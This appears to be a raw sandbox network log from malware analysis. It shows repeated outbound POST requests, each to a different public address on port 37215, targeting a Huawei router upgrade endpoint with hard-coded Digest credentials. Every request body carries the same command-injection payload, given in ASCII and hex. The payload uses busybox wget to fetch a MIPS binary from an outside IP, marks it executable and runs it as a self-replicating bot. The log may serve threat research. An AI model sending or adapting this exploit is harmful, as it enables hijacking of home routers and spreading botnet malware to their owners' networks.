                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2263192.168.2.235200841.42.24.21437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665416956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2264192.168.2.233983039.28.208.16637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665421963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2265192.168.2.2355888157.88.246.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665448904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2266192.168.2.2360608223.63.172.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665596962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2267192.168.2.233320441.248.239.2737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665601015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2268192.168.2.235328641.230.44.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665621996 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2269192.168.2.2350712157.20.27.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665631056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2270192.168.2.2340098157.161.200.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665647984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2271192.168.2.235628678.241.90.5837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665659904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2272192.168.2.2344348157.3.93.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.665889025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2273192.168.2.2340642206.179.15.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666176081 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
